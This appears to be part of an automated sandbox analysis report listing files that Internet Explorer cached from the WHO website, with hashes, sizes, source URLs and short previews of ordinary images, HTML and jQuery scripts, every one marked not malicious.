                                                                                                                                                                    SHA1:048673CBAD9FF402269D1604E5CFC9FBC05C398E
                                                                                                                                                                    SHA-256:12E686E186A80C9D49F224BA6718A2BE0B1D17BA7E0873AA62BC5F701E1D22C6
                                                                                                                                                                    SHA-512:7824939C29AFB680F93F4EDE965A63B535255614E4D3B98E452DD1EE0F564F468B9BD614CF8C16B69792CF3BFA24DE313947EAFC51FC929AAF4DFAA7BB58FEDD
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ResourcePackages/WHO/assets/dist/styles/origin.min.css?v=12.1.7126.28741
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\publications-hero-image-thumb[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1024x589, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):59892
                                                                                                                                                                    Entropy (8bit):7.943610217019654
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:IIfsxbP7+X1bkkqWe0Rn+55RD9m91dV3A6Q4PfSl:zspPQkkqWs5fU3dVu6g
                                                                                                                                                                    MD5:E16B0792DD326A5A820A2F3F30C2FE66
                                                                                                                                                                    SHA1:981578B4C34850849DF0835ED6237C01A2F5B20A
                                                                                                                                                                    SHA-256:78BFDB6F8E80FF99D4FD642F6D387B37039DBCF5948C44A07EB9FA47E9E0F3DE
                                                                                                                                                                    SHA-512:7CBC54EEFFF90802DA3D73F760E0E1640038D5A900798E1FF62DAF854D259DBE0751D82667CF40CB55453FF09F82FF43A29CE84A790702BFDA8D0E9A2293B7D6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/publications/publications-hero-image-thumb.tmb-1024v.jpg?sfvrsn=8174ac48_1
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sh.f48a1a04fe8dbf021b4cda1d[1].htm
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):72412
                                                                                                                                                                    Entropy (8bit):5.387358706587146
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:8V69lS5FN9hXuSja0+S+4p94gHaF1NCo+mzITLE5zv:88lStbuy+4pag6jNCaIUl
                                                                                                                                                                    MD5:AACCA0023866ABEF872428C704F65AE9
                                                                                                                                                                    SHA1:8C653A4221EC9A027A6AFC42BC2D376D613D5BB4
                                                                                                                                                                    SHA-256:55D783462E6671FA985A6B0829DB15474F4E57F0555C93E15CC2DB6A1D1E6CAB
                                                                                                                                                                    SHA-512:F92BE33D2DB5B072358905F4E07320F69EAECCF54CE9F31579506ADD7C4D9FCA02340DADCFE6AA3D7D32BBBDFC8331C523C535DB9E06F5410044F1649151858C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\sh.f48a1a04fe8dbf021b4cda1d[2].htm
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):72412
                                                                                                                                                                    Entropy (8bit):5.387358706587146
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:8V69lS5FN9hXuSja0+S+4p94gHaF1NCo+mzITLE5zv:88lStbuy+4pag6jNCaIUl
                                                                                                                                                                    MD5:AACCA0023866ABEF872428C704F65AE9
                                                                                                                                                                    SHA1:8C653A4221EC9A027A6AFC42BC2D376D613D5BB4
                                                                                                                                                                    SHA-256:55D783462E6671FA985A6B0829DB15474F4E57F0555C93E15CC2DB6A1D1E6CAB
                                                                                                                                                                    SHA-512:F92BE33D2DB5B072358905F4E07320F69EAECCF54CE9F31579506ADD7C4D9FCA02340DADCFE6AA3D7D32BBBDFC8331C523C535DB9E06F5410044F1649151858C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://s7.addthis.com/static/sh.f48a1a04fe8dbf021b4cda1d.html
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\yEIPefMsf70[1].htm
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:HTML document, UTF-8 Unicode text, with very long lines
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):49280
                                                                                                                                                                    Entropy (8bit):5.826156363631764
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:GKKslt1VI1g0IkFQhH4ZJH1NFC2rq4kW3s4XJVemgCGDwb2F+6gLF:yFkHeNFRWW3sOVntpN6M
                                                                                                                                                                    MD5:F5806B6B079504FBF0CB7ECCC860B095
                                                                                                                                                                    SHA1:C9ED87692CAFA46AAD5E51D0184C5713ECF85BE0
                                                                                                                                                                    SHA-256:4F0A000E580AD08E235F75D8CCF3A5F61D71CBA98B75DF4C768180D62C915757
                                                                                                                                                                    SHA-512:06EBEFC37AD50DB72D80CC7208757D71DD2C73D707531A70351A3BD644C89126B06988DD368AA26331E9CCC5F0862D267FE6575F5DF92726E8E3F1BD87CA8EF8
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview: <!DOCTYPE html><html lang="en" dir="ltr" data-cast-api-enabled="true"><head><meta name="viewport" content="width=device-width, initial-scale=1"><style name="www-roboto" nonce="IHw7mGqzzDHOAi/xBnOaZg">@font-face{font-family:'Roboto';font-style:normal;font-weight:400;src:url(//fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxM.woff)format('woff');}</style><script name="www-roboto" nonce="IHw7mGqzzDHOAi/xBnOaZg">if (document.fonts && document.fonts.load) {document.fonts.load("400 10pt Roboto", "E"); document.fonts.load("500 10pt Roboto", "E");}</script><link rel="stylesheet" href="/s/player/9f1ab255/www-player.css" name="www-player" nonce="IHw7mGqzzDHOAi/xBnOaZg"><style nonce="IHw7mGqzzDHOAi/xBnOaZg">html {overflow: hidden;}body {font: 12px Roboto, Arial, sans-serif; background-color: #000; color: #fff; height: 100%; width: 100%; overflow: hidden; position: absolute; margin: 0; padding: 0;}#player {width: 100%; height: 100%;}h1 {text-align: center; color: #fff;}h3 {margin-top: 6px; margi
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\210323_BLS21079_WHO_WHD_EN_web-banner_A.1[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 479x164, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):10644
                                                                                                                                                                    Entropy (8bit):7.876397234646194
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:i3qNtnxXrCT/4MlLddBqiHsHXoJlO1ykqSzB0tshcgD/b2ZJ2zQR7dddddd9:i36ty1r/s+w1ykfLcgDKZJ4Y
                                                                                                                                                                    MD5:D65C603C0748D5D2272AF759413AF467
                                                                                                                                                                    SHA1:FEBD30A121C2672ECDC7DBCCE430C1DC1451285A
                                                                                                                                                                    SHA-256:1BBD86F9B4D2F1594EAB8EACA5B5E173D66C7C6502DA2F4D49410A515E79654F
                                                                                                                                                                    SHA-512:782B211BCE58D9DD74414AEAED433BD285EA721B7D59D8856BF561BDF6D615ED105BD3EAF345D8A184C6D68652C99ED1CDD3E527F6EE82B6D7E05DE788A2A705
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/campaigns/world-health-day/210323_bls21079_who_whd_en_web-banner_a.1.tmb-479v.jpg?sfvrsn=f92ac7aa_2
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\210323_BLS21079_WHO_WHD_EN_web-banner_A.1[2].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 768x262, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):19508
                                                                                                                                                                    Entropy (8bit):7.842512517006768
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:RCvz/W/KyGtmTE3OE6JamYaB2RRTw1f3Af1G/N8SLv1yhnWgvMb3GmcKd7EtU:Rez/WR4+bJak2RR+3s18N8SLvCtYUtU
                                                                                                                                                                    MD5:8FB88ECF23E89D3F936708FACC49CACF
                                                                                                                                                                    SHA1:392D54B57FD15CB983C7095480CE9B09F8E13226
                                                                                                                                                                    SHA-256:F0299F8EE0A706F65F988EB36796F5823922E5570B2EEB1DD475B7052F96CDFB
                                                                                                                                                                    SHA-512:6880AC16D495602E7720A5CFC459377750EBB5426712B15E642D816EFC235C7689FE36D23A38B2F39319392482B889EF0EF4444A8595B43123E3B826359BB424
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/campaigns/world-health-day/210323_bls21079_who_whd_en_web-banner_a.1.tmb-768v.jpg?sfvrsn=f92ac7aa_2
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\3-wha71-dg-tedros-opening-speech[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 768x512, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):24576
                                                                                                                                                                    Entropy (8bit):7.9741020794538375
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:DD7PIESMHiNWhbTFxkg8fDlEqgD/M+VlCfV6sQRvZHzBAk93t/GePCSlUCHiUtdL:n7vA+PjYBTg7XcE1G0/cCHiUtjFBy2
                                                                                                                                                                    MD5:7009B04FECF6EE1F810344E2519C1632
                                                                                                                                                                    SHA1:3005449E27B0B4FA2B4EFC36AF1190BEDABDC1C9
                                                                                                                                                                    SHA-256:68957ABB2CEC5023531902126466B45BE0D51901A23D406B374A1F585C2F3652
                                                                                                                                                                    SHA-512:FB12DA8AC77A6694393628B9D8434C01ABA52C6373B9F0C5CA376209317CEEA80AE5AD3D88D215EC63447C429125D6974B0A594ED700C6C7D499E40C722FA00C
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/world-health-assembly/wha71/day-1/3-wha71-dg-tedros-opening-speech.tmb-768v.jpg?Culture=en&sfvrsn=c6b9209c_12
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\3-wha71-dg-tedros-opening-speech[2].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, progressive, precision 8, 1024x682, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):38650
                                                                                                                                                                    Entropy (8bit):7.980841730185706
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:ZBqqtI9kvs37DamyXYcLntH+IH5zy2ndhswWsfp/xl5/iaDh:6qOuiPaAcTtH+IH5zy6hKsfp/Fio
                                                                                                                                                                    MD5:2B728A5A5B15E1F773A80CB11F6BC65B
                                                                                                                                                                    SHA1:EC51DF06AFBDC1891AB21D3D9AD1C1FAC3F254D4
                                                                                                                                                                    SHA-256:9C68D8F3B91F3B15314E2268CE39E54E42DB134D39131B1DB0BC7AC74B296155
                                                                                                                                                                    SHA-512:A38B732028C41353601AF9F099111263EF4A89F13A7610BD6AD40A04A3375572CD5BCA2BF40654210D74E951B6B33095F7518692CFCFFCBF45B24B696C6040F4
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/world-health-assembly/wha71/day-1/3-wha71-dg-tedros-opening-speech.tmb-1024v.jpg?Culture=en&sfvrsn=c6b9209c_12
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\DSC_8725_s[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 479x313, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):30118
                                                                                                                                                                    Entropy (8bit):7.977459180715009
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:oNSTFCr/0pGhsgirF3oEjS3PUHhaZS+bpVXl+SKlGKCa2q:oYTFCr8pG2lLjxz+bpFIdoKz2q
                                                                                                                                                                    MD5:3D9BD82AFBAE8AFFACB6C57828A5975F
                                                                                                                                                                    SHA1:24A1BB72D1D165BAF9717887538699A2F351AC02
                                                                                                                                                                    SHA-256:6474EA00C22E130A9AE0A86511908BBF68C30D7A3FD77EE30B26E176F84034E9
                                                                                                                                                                    SHA-512:AD8C34AA332897F792FBEE598BE897412DD5461F218564D3FC9EBBA9C6D0D3EF28D5B56BA01B81AB7613D6FD10A81D40A034182089D950235EA6CFEBA71A4E6E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/health-topics/coronavirus/dsc_8725_s.tmb-479v.jpg?Culture=en&sfvrsn=f688b931_6
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\DSC_8725_s[2].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 768x503, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):65607
                                                                                                                                                                    Entropy (8bit):7.982204543924515
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:gC4meKg/y9h2M11WjH28eQoHeRUkTKxXc8LfvuRiNZXAUh:e0gG116IQGe5mxM8LnhZT
                                                                                                                                                                    MD5:19519B7C057368CEE4C933AFD3E0380B
                                                                                                                                                                    SHA1:6EE8A0A2D26198B0DF8150C22A666C8318EB68A4
                                                                                                                                                                    SHA-256:19ACD8662CB3131304744AC40F3F5BA9F34592695069D1F8FCB0E3CA6F7CCD53
                                                                                                                                                                    SHA-512:59E042F686CEA24ED978508E00CFFEFFEB11F0F333841E45FF8F006B391A96540D9D447CAF5422FBD344E933D32962880F814430A365EE6D893803609AAD5082
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/health-topics/coronavirus/dsc_8725_s.tmb-768v.jpg?Culture=en&sfvrsn=f688b931_6
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\FL794448.htm
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):125455
                                                                                                                                                                    Entropy (8bit):5.059756207234469
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:y2oVCDlLZDKDjMODzzCH9Jel/3x+wLXiDTBIjD82B71Waca43GC5Q4838NILk37Q:yCZVGPMH9JH0lNB74aC3rILk37NP6445
                                                                                                                                                                    MD5:7076E8DC6270E59AF82533C83892FEFA
                                                                                                                                                                    SHA1:9D9420F8187DA3249B50155F935348D0DE18D2A7
                                                                                                                                                                    SHA-256:8E4FB552D7E739D7559A4E35FEC8EC409FCA552BAB26E80CFCE9D4332F71E72C
                                                                                                                                                                    SHA-512:62F1E2DE7CC87C3C588E573949E75BE2E86729D8F2152414E775F8C0669BE01F67771307BBA2C284FF339A599A3DD6EFDE6CE40CE7AFA6463AF95F5144520DBF
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/
                                                                                                                                                                    Preview: <!DOCTYPE html> <html lang="en"> <head> head to scrape:on --> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1"><title>...WHO | World Health Organization..</title> <link rel="shortcut icon" href="/favicon.ico"> <link rel="manifest" href="/manifest.json"> <link href="//use.fontawesome.com/releases/v5.0.10/css/all.css" rel="stylesheet" type="text/css" /> <link rel='stylesheet' href='/ResourcePackages/WHO/assets/dist/styles/grid.min.css?v=12.1.7126.28741' ><link rel='stylesheet' href='/ResourcePackages/WHO/assets/dist/styles/origin.min.css?v=12.1.7126.28741' > head to scrape:off --> <link rel='stylesheet' href='/ResourcePackages/WHO/assets/dist/styles/main.min.css?v=12.1.7126.28741' > <link rel='stylesheet' href='/ResourcePackages/WHO/assets/dist/styles/print.min.css?v=12.1.7126.28741' media='print'> .. <script>.. var lang = document.documentEleme
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\RS34669_Covax_Sticker_CMYK_Covax_5_Sqaure_CovaxColours[1].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 479x320, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):23947
                                                                                                                                                                    Entropy (8bit):7.953180725335218
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:SFiNN6U1oYJWWZCcSgS/zC/qOo+SuCq16x70KMO/edofI5q4KabUPt5/8:S8NoU1osCcXS/7Oo+Bdsx7VBMNbK8
                                                                                                                                                                    MD5:C7D73DEA47A04842067A9F049DF10E78
                                                                                                                                                                    SHA1:EF27DF98EF1D3D542BA8F74A5D5460E2E87815B8
                                                                                                                                                                    SHA-256:6E7194A987421E2B6BB3DD7321896F41568305F0F4A1E809AFAE317C0C28DBE2
                                                                                                                                                                    SHA-512:D4FAA659282A621966408D636B158001FB2143FCC386457E2FC2E7A59EDBBA1612FD8C08F0B90F7EBB0F5D9AE9A79B8243ACB1429BD740F24A2B76FFCABC57EE
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/searo---images/countries/sri-lanka/rs34669_covax_sticker_cmyk_covax_5_sqaure_covaxcolours.tmb-479v.jpg?Culture=en&sfvrsn=5b1bfc6f_6
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\RS34669_Covax_Sticker_CMYK_Covax_5_Sqaure_CovaxColours[2].jpg
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 768x513, frames 3
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):45344
                                                                                                                                                                    Entropy (8bit):7.943160464664274
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:768:u2jd1UwVmsFmdNFhpaVBF8hRc+G+wNrv3VomzGSwxVlGLijhBRV/YuI1VtgU1v:u2BB0c0b/ayhRPG+wNjlozZE+jhBR017
                                                                                                                                                                    MD5:B3829C462B4095FC9F892F9D437D7C63
                                                                                                                                                                    SHA1:A683D5C22EB4E26C01495C0CD3581DBE1B428298
                                                                                                                                                                    SHA-256:0B9BDD6CAFF4A255E4778066FB550E465D8B72516FAFA6A97672A1D4DC3BED61
                                                                                                                                                                    SHA-512:525F8E8CDDEFF22434C809E8810B8E7EAAA9B0E0C8A67B038625F16B12F120F7FC165F3CB7148006CF2CB5D4C585E3A913368206DC45F5802DB746014344823B
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/images/default-source/searo---images/countries/sri-lanka/rs34669_covax_sticker_cmyk_covax_5_sqaure_covaxcolours.tmb-768v.jpg?Culture=en&sfvrsn=5b1bfc6f_6
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\ScriptResource[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):88145
                                                                                                                                                                    Entropy (8bit):5.291106244832159
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:1536:yTExXUZinxD7oPEZxkMV4SYKFMbRHZ6H5HOHCWrcElzuu7BRCKKBEqBsojZlOPma:ygZm0H5HO5+gCKWZyPmHQ47GKe
                                                                                                                                                                    MD5:220AFD743D9E9643852E31A135A9F3AE
                                                                                                                                                                    SHA1:88523924351BAC0B5D560FE0C5781E2556E7693D
                                                                                                                                                                    SHA-256:0925E8AD7BD971391A8B1E98BE8E87A6971919EB5B60C196485941C3C1DF089A
                                                                                                                                                                    SHA-512:6E722FCE1E8553BE592B1A741972C7F5B7B0CDAFCE230E9D2D587D20283482881C96660682E4095A5F14DF45A96EC193A9B222030C53B1B7BBE8312B2EAE440D
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ScriptResource.axd?d=wIuRaUoAZ6lXIF1Yn5fO2EpVfHcRi4irbKbgceV3EeMTgdEj-Ek9QoQbG7mp45iS4XdHurGk8hBAXXDnoR0RqHzZa24YVwVTlIu5rG60plrL-8Eufi9i0CFBYdqNSSyQsLamqkpHqRo9WOM3m8LuU9HR5Kkk3eZlZFrAS4vVgmRuq0330&t=ffffffffcd3c2666
                                                                                                                                                                    Preview: /*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\ScriptResource[2].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):8270
                                                                                                                                                                    Entropy (8bit):5.006208841630281
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:zDdwADmtum6rPl2K/kNEZf+NEVZfau6xnhjOLh5xP5tQPqXIz:zDdwAAurrd4EZfJ9au62Lh5xPEqXIz
                                                                                                                                                                    MD5:4FB244EB938FA6AFA087385107EE5133
                                                                                                                                                                    SHA1:F754E124FF0B72332DCB26A0A6AC46C76D1DDD6E
                                                                                                                                                                    SHA-256:CDA66AAAC66C47585D9917FCF9E6C0F28322715CAF35B94E0F8224AB629182C4
                                                                                                                                                                    SHA-512:61E609DF6806A2CD53BC69B0E325D9C83E45B5B1E9E22BBA6493834249453B531853DB3C95F76C895901D3736A7EC3D3871D427C99AC0DFD5C15F88643C89CF6
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/ScriptResource.axd?d=EydukmxBmDstn7gSYzQESE1bnHjeXRVx7U6aQHJyFA9m0Lf0S2mLTHIjDE43-hll5grqfOTCvX6EmOM9LNFV337jy4D-8ywkRJfvfs9rwa9DHQKxleN2Wm83nE30kTqWc6-SapTPLY8qz6Xa4mLUpUO4eNtgV_s22zOlIqeJlVeUWOY70&t=ffffffffcd3c2666
                                                                                                                                                                    Preview: /*! jQuery Migrate v1.2.1 | (c) 2005, 2013 jQuery Foundation, Inc. and other contributors | jquery.org/license */.jQuery.migrateMute === void 0 && (jQuery.migrateMute = !0), function (e, t, n) { function r(n) { var r = t.console; i[n] || (i[n] = !0, e.migrateWarnings.push(n), r && r.warn && !e.migrateMute && (r.warn("JQMIGRATE: " + n), e.migrateTrace && r.trace && r.trace())) } function a(t, a, i, o) { if (Object.defineProperty) try { return Object.defineProperty(t, a, { configurable: !0, enumerable: !0, get: function () { return r(o), i }, set: function (e) { r(o), i = e } }), n } catch (s) { } e._definePropertyBroken = !0, t[a] = i } var i = {}; e.migrateWarnings = [], !e.migrateMute && t.console && t.console.log && t.console.log("JQMIGRATE: Logging is active"), e.migrateTrace === n && (e.migrateTrace = !0), e.migrateReset = function () { i = {}, e.migrateWarnings.length = 0 }, "BackCompat" === document.compatMode && r("jQuery is not compatible with Quirks Mode"); var o = e("<input/>
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Search-box.min[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):5356
                                                                                                                                                                    Entropy (8bit):5.199515941231924
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:lsa2aKTE9Ad0ZUmA9sW8dHgpUkzrnNQu+gzs+fIRHi33cjgBC72:PTebsgUk/rARHi33EgY72
                                                                                                                                                                    MD5:232F94258D92EA1885690A91531F5401
                                                                                                                                                                    SHA1:FABFD4FED1C99BBB3E3AD4D5EB7E6EA0D7254B23
                                                                                                                                                                    SHA-256:B496C436E9861815009B3211A92DA3E6038D79BA690C6184DD01B2810F5CFE09
                                                                                                                                                                    SHA-512:5AAE900E39A7FDB4625EE00B29AAB1A0CE014A11118C1A7D023E4BD1E931A99FDEDFCB0D0C808C33FF406C3D19C7973FE9AE9D43227CE1AB0C2BF3FE7C89D600
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    IE Cache URL:https://www.who.int/Frontend-Assembly/Telerik.Sitefinity.Frontend.Search/Mvc/Scripts/SearchBox/Search-box.min.js?package=WHO&v=LTExNTI1MzQxODA%3d
                                                                                                                                                                    Preview: "use strict";function GetQueryStringParameteres(){for(var queryParams=[],params=window.location.href.slice(window.location.href.indexOf("?")+1).split("&"),i=0;i<params.length;i++){var name=params[i].split("=")[0],value=params[i].split("=")[1];queryParams[name]=value}return queryParams}function GetPreselectedValues(data,loaded){if(!loaded)return null;for(var preselectedValues=[],i=0;i<loaded.length;i++)for(var j=0;j<data.length;j++)data[j].Value==loaded[i]&&preselectedValues.push(data[j]);return preselectedValues}!function($){$(document).ready(function(){$("#current-culture").val();for(var searchInput=$('input[type="search"]'),searchClearIcon=searchInput.closest(".input-wrapper").find(".k-icon"),searchBoxIdFields=$('[data-sf-role="searchTextBoxId"]'),i=0;i<searchBoxIdFields.length;i++){var searchBoxIdField=$(searchBoxIdFields[i]);featherSearchBoxWidget({resultsUrl:searchBoxIdField.siblings('[data-sf-role="resultsUrl"]').first().val(),indexCatalogue:searchBoxIdField.siblings('[data-sf-ro
                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\WebResource[1].js
                                                                                                                                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                    File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                                                    Category:downloaded
                                                                                                                                                                    Size (bytes):3855
                                                                                                                                                                    Entropy (8bit):5.1064694730487385
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:xvTmCcxNDbT2g03nDfmTHqsk04CoDAL1iQBq/cS5gsT+iM0TEM4SSF48:BKHmMNk04CorzSLF48
                                                                                                                                                                    MD5:20BC91824BE4AE00DDDA6A70181D05E6
                                                                                                                                                                    SHA1:DDF3FC6BBACB9D40822F3FCDE0558F51E74D43EE
                                                                                                                                                                    SHA-256:730D716E47B4A720B56FB7A31DDD58AEEA3AFE791703970C60F80CDA610E0CE5
                                                                                                                                                                    SHA-512:1A4B5E6B3F2EC014BE85A9FF0FF2CB9C671679B2E6CD0DA8C65C438F36CB67F73B5E497AA31CC3C95A04DB05066CCCB85720B6C4EB71367975C177F8E201DB84
                                                                                                                                                                    Malicious:false
